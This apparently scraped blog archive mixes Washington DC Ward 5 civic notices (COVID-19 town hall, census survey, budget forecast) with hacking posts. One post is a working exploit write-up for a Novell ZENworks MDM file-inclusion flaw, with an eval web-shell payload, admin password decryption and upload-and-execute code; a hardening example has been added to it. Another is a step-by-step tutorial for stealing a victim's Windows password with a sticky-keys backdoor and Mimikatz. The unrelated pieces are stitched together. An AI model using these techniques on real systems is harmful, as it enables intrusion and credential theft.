Thursday 30 April 2020

[WardFive] TODAY at 4pm: Virtual Conversation on Supporting Students during COVID-19 with CM McDuffie

Join Councilmember McDuffie today, Thursday, April 30, at 4pm on Facebook live as he hosts a conversation on distance learning and how to support our students during COVID-19. Councilmember McDuffie will be joined by:

 

Kemi Husbands
Principal, Langdon Elementary School

Maquita Alexander
Executive Director, Washington Yu Ying PCS

Amy Winkle, LICSW
Rising Sun Therapy, LLC

Yuvay Ferguson
DC Parent

 

Facebook event: https://www.facebook.com/events/536016850641080

 

Tune in at 4pm: https://www.facebook.com/KenyanRMcDuffie/

(You do not need to be on facebook to watch, just click this link at 4pm today)

 

 

---

 

Nolan Treadway

Communications Director

Office of Ward 5 Councilmember Kenyan R. McDuffie

Chairman Pro Tempore

Chair, Committee on Business and Economic Development

1350 Pennsylvania Avenue, NW, Suite 506

Washington, DC 20004

Main: 202-724-8028

Desk: 202-724-8918

Cell: 202-445-0361

ntreadway@dccouncil.us

www.KenyanMcDuffieWard5.com

Sign Up to Receive the Ward 5 Report: http://www.kenyanmcduffieward5.com/signup/

Sign Up for the Press List: http://eepurl.com/co1I9P


Wednesday 29 April 2020

cheat_training_group Folding kayak

--
laks@calleva.org
calleva.org/liquid-adventures-kayak
---

Sunday 26 April 2020

[WardFive] 2020 Census - Household Pulse Survey: Measuring Social and Economic Impacts during the COVID-19 Pandemic

 

https://www2.census.gov/data/experimental-data-products/household-pulse-survey/household-pulse-survey-questionnaire.pdf?#

 

https://my2020census.gov/

Household Pulse Survey: Measuring Social and Economic Impacts during the COVID-19 Pandemic

What is the Household Pulse Survey?

 

The U.S. Census Bureau, in collaboration with five federal agencies, is in a unique position to produce data on the social and economic effects of COVID-19 on American households. The Household Pulse Survey is designed to deploy quickly and efficiently, collecting data on a range of ways in which people’s lives have been impacted by the pandemic. Data will be disseminated in near real-time to inform federal and state response and recovery planning.

If you have been invited to participate in the survey, you may find more information here.

  Household Pulse Survey Questionnaire  

 

What information will the Household Pulse Survey collect?

 

The Household Pulse Survey will ask individuals about their experiences in terms of employment status, spending patterns, food security, housing, physical and mental health, access to health care, and educational disruption.  The questionnaire is a result of collaboration between the U.S. Census Bureau and the USDA Economic Research Service (ERS), the Bureau of Labor Statistics (BLS), the National Center for Health Statistics (NCHS), the National Center for Education Statistics (NCES), and the Department of Housing and Urban Development (HUD).

 

The data collected will enable the Census Bureau to produce statistics at a state level and for the 15 largest Metropolitan Statistical Areas (MSAs).  The survey also is designed to be longitudinal:  data will provide insights with regard to how household experiences changed during the pandemic.

 

When will Data be Made Available from the Household Pulse Survey?

 

Data collection for the Household Pulse Survey will begin on April 23, 2020.  The Census Bureau will collect data for 90 days, and release data on a weekly basis.  (For the first release, the Census Bureau anticipates it will take two weeks after the first week of data collection to prepare and weight the data; subsequent releases will then be made on a weekly basis.)

 

How is the Household Pulse Survey Different from Other Surveys Conducted by the Census Bureau?

 

The Census Bureau and its federal statistical partners are considered the preeminent source of the nation's most important benchmark surveys.  Many of these surveys have been ongoing for more than 80 years and provide valuable insight on social and economic trends. 

 

The production of these benchmark surveys is by nature a highly deliberative process.  While efforts are underway to introduce COVID-19 questions into these surveys, that process can take months, sometimes years, before data are made available.  

 

The approach for the Household Pulse Survey is different:  It is designed to be a short-turnaround instrument that will provide valuable data to aid in the post-pandemic recovery. The Census Bureau is fielding the Household Pulse Survey as a demonstration project that is part of the Experimental Data Product series. 

 

 

Robert Vinson Brannum

Advisory Neighborhood Commissioner

President Emeritus, DC Federation of Civic Associations, Inc.

 


APPLE IPHONE X FACE ID CAN BE HACKED WITH SILICON MASK

Just a week after Apple released its brand-new iPhone X on November 3, a team of researchers claimed to have successfully hacked Apple's Face ID facial recognition technology with a mask that costs less than $150. They said the iPhone X's Face ID can easily be defeated with a silicone mask.

Yes, Apple's "ultra-secure" Face ID security for the iPhone X is not as secure as the company claimed during its launch event in September this year.

"Apple engineering teams have even gone and worked with professional mask makers and makeup artists in Hollywood to protect against these attempts to beat Face ID," Apple's senior VP of worldwide marketing Phil Schiller said about Face ID system during the event.

"These are actual masks used by the engineering team to train the neural network to protect against them in Face ID."

However, the bad news is that researchers from Vietnamese cybersecurity firm Bkav were able to unlock the iPhone X using a mask.

Yes, Bkav researchers have a better option than holding it up to your face while you sleep. Bkav researchers re-created the owner's face through a combination of a 3D-printed mask, makeup, and 2D images, with some "special processing done on the cheeks and around the face, where there are large skin areas", and a nose made from silicone.

The researchers have also published a proof-of-concept video, showing the brand-new iPhone X first being unlocked using the specially constructed mask, and then using the Bkav researcher's face, in just one go.

"Many people in the world have tried different kinds of masks but all failed. It is because we understand how AI of Face ID works and how to bypass it," an FAQ on the Bkav website said.

"You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face. It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought."

The researchers explain that their "proof-of-concept" demo took about five days after they got the iPhone X on November 5th. They also said the demo was performed against the face of one of their team members, without training the iPhone X to recognize any components of the mask.

"We used a popular 3D printer. The nose was made by a handmade artist. We use 2D printing for other parts (similar to how we tricked Face Recognition 9 years ago). The skin was also hand-made to trick Apple's AI," the firm said.

The security firm said it cost the company around $150 for parts (which did not include a 3D printer), though it did not specify how many attempts its researchers needed to bypass the security of Apple's Face ID.

It should be noted that creating such a mask to unlock someone's iPhone is a time-consuming process and it is not possible to hack into a random person's iPhone.

However, if you prefer privacy and security over convenience, we highly recommend using a passcode instead of a fingerprint or Face ID to unlock your phone.


Ophcrack


"Ophcrack is an open source (GPL license) program that cracks Windows LM hashes using rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. There is also a Live CD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. These tables can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. Larger rainbow tables (for LM hashes of passwords with all printable characters, including symbols and space) are available for purchase from Objectif Securité. Starting with version 2.3, Ophcrack also cracks NT hashes. This is necessary if generation of the LM hash is disabled (this is default on Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored)."

Website: http://ophcrack.sourceforge.net


Saturday 25 April 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (can't stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe, etc.) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the function, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.
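
The validity check from DUSAP.php, set beside one way to harden it, as an added example that is not Novell's code or the original post's: the client sends only a language name, which is matched against a fixed list and resolved to a canonical path inside the language directory. The function names, the language list and the throwaway directory tree are constructed for the demonstration.

```php
<?php
// Added example, not Novell's code. File names and the language list are constructed.

// "Before": the validity check from DUSAP.php, reduced to a function.
// A fixed prefix plus file_exists() says nothing about where the path
// ends up once "../" segments are resolved.
function prefix_check_accepts(string $language): bool
{
    return (substr($language, 0, 14) == 'res\\languages\\'
         || substr($language, 0, 14) == 'res/languages/')
        && file_exists($language);
}

// "After": the client sends a language *name*; the server owns the path.
function resolve_language_file(string $name, string $languageDir, array $allowed): ?string
{
    // 1. Exact-match allowlist: no separators, dots or prefixes to reason about.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise both the directory and the candidate file.
    $base = realpath($languageDir);
    $path = realpath($languageDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Defence in depth: the resolved file must still sit inside the directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// --- Demonstration on a throwaway directory tree (all constructed) ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/res/languages', 0700, true);
file_put_contents($root . '/res/languages/English.php', "<?php // language strings\n");
file_put_contents($root . '/outside.txt', "not a language file\n");
chdir($root);

$inputs = [
    'res/languages/English.php',        // what the login form normally sends
    'res/languages/../../outside.txt',  // prefix matches, file exists, wrong directory
];
foreach ($inputs as $in) {
    printf("prefix check  %-34s => %s\n", $in,
        prefix_check_accepts($in) ? 'accepted' : 'rejected');
}

$allowed = ['English'];
foreach (['English', '../../outside', 'res/languages/../../outside.txt'] as $name) {
    $resolved = resolve_language_file($name, $root . '/res/languages', $allowed);
    printf("allowlist     %-34s => %s\n", $name,
        $resolved === null ? 'rejected' : 'accepted');
}

// Clean up the constructed tree.
chdir(sys_get_temp_dir());
unlink($root . '/res/languages/English.php');
unlink($root . '/outside.txt');
rmdir($root . '/res/languages');
rmdir($root . '/res');
rmdir($root);
```

In the login handler, only the validated name would be stored in the session and the `require_once` target recomputed from it on each request, so a session value is never used directly as a path.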


[WardFive] DC 2020 Census Self-Response Rates

https://my2020census.gov/

https://my2020census.gov/app/intro/state

https://2020census.gov/en/response-rates

District of Columbia Internet Self-Response [responses received as of 4/24/2020]

District of Columbia Total Self-Response [responses received as of 4/24/2020]

 

 

Robert Vinson Brannum

Advisory Neighborhood Commissioner

President Emeritus, DC Federation of Civic Associations, Inc.

 


Ettercap: Man In The Middle (MITM)


"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis."


Website: http://ettercap.sourceforge.net


Friday 24 April 2020

[WardFive] CM McDuffie on Today's Updated District Budget Forecast

 

From: <kmcduffie@dccouncil.us>
Reply-To: <kmcduffie@DCCOUNCIL.US>
Date: Friday, April 24, 2020 at 5:12 PM
To: <ntreadway@DCCOUNCIL.US>
Subject: April 24 Coronavirus Response - Updated District Budget Forecast

 

Below are today's updates on the District's response to the coronavirus pandemic. For the latest and most comprehensive information always visit http://coronavirus.dc.gov.


 

 

DC's Chief Financial Officer Provides Budget Forecast Update

 

 

Today, District of Columbia Chief Financial Officer Jeffrey DeWitt provided an updated financial forecast for the District to the Mayor and Council. You can view the full presentation here and read Councilmember McDuffie's statement below.

 

"District of Columbia Chief Financial Officer Jeffrey DeWitt just provided the Mayor and Council with an updated financial forecast and now projects a budget shortfall of $722 million in the current fiscal year, and additional downward revisions of $774 million, $606 million, and $568 million over the next three years. Based on all the numbers, the CFO today indicated that we are now in a recession.

While that is certainly not welcome news, we all know that this pandemic has had a devastating impact on our economy. We are not alone among cities in the United States facing these challenges, but we are well-positioned compared to some of our counterparts. We entered this crisis with a full rainy day fund, a well-funded unemployment insurance fund, and our employee pension obligations fully funded.

I believe the city should be able to navigate this crisis in both the long and short term with responsible policies and spending. However, there will be difficult decisions in the years and budgets ahead. The impact on District small businesses and workers is profound, but I remain steadfast and optimistic that the future of our city is bright."

 

 

Small Business Spotlight: Roaming Rooster

 

 

Roaming Rooster on Bladensburg Road NE continues to serve delicious chicken to the public for carry out and delivery in the midst of the public health emergency. They have also stepped up and provided meals to health care workers at Providence Urgent Care, Howard University Hospital, and United Medical Center. The restaurant interior is closed for social distancing but you can simply place your order online and make a contact-less pickup. Order ahead via their website, GrubHub, Postmates, or Uber Eats.


 

 

 

 

 

 

 

 

---

 


Thursday 23 April 2020

Cracking Windows 8/8.1 Passwords With Mimikatz



You might have read my previous posts about how to remove Windows passwords using chntpw and might be wondering why I am writing another tutorial to do the same thing. Well, today we are not going to remove the Windows user password; rather, we are going to be more stealthy: we are going to find out what the user's password is and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boot the victim's PC with your live bootable pendrive (Kali Linux on a pendrive in my case) and open a terminal window.

3. Mount the volume/drive on which Windows 8/8.1 is installed by typing these commands in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in read/write mode; otherwise you might not be able to write to the drive. Also, /dev/sda1 is the name of the drive on which the Windows OS is installed; to list your drives you can use lsblk -l or fdisk -l. The last argument is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack. Now let's reboot the system and boot our victim's Windows 8/8.1 OS.

8. After reaching the Windows login screen, plug in the USB device with mimikatz on it and hit the shift key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your USB drive; in my case it's drive G:




10. Now navigate to the proper version of the mimikatz binary folder (Win32 for 32-bit Windows and x64 for 64-bit Windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

The first command enables debug mode.
The second one elevates the privileges.
The last one lists the passwords, which include the picture password and PIN (if set by the user).









That's it, you got the password and everything else needed to log into the system. No more breaking and mess making; it's simple, it's easy, and best of all it's not noisy lol...

Hope you enjoyed the tutorial have fun :)

Wednesday 22 April 2020

Fragroute


"fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour."

Website: http://monkey.org/~dugsong/fragroute
